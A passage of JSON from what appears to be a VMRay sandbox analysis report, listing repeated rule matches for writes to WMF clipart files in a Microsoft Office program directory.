"technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185798.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36692", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185798.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185800.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36703", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185800.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185806.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36712", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185806.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185818.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36721", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185818.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185828.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36732", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185828.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185834.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36739", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185834.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185842.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36746", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185842.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186346.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36753", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186346.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186360.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36760", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186360.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186362.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36771", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186362.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186364.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36780", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186364.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187647.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36789", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187647.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187815.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36796", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187815.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187817.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187817.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36803", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187817.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187819.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187819.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36810", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187819.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187825.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187825.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36817", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187825.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187829.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187829.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36824", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187829.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187835.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187835.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36831", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187835.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187837.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187837.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36838", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187837.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187839.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187839.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36845", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187839.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187847.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187847.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36852", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187847.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187849.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187849.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36859", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187849.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187851.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187851.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36866", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187851.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187859.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187859.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36873", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187859.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187861.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187861.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36880", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187861.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187863.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187863.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36887", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187863.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187881.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36894", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187881.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187883.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36901", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187883.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187893.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36908", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187893.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187895.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36915", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187895.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187921.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187921.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36922", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187921.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188511.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188511.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36929", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188511.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188513.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188513.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { 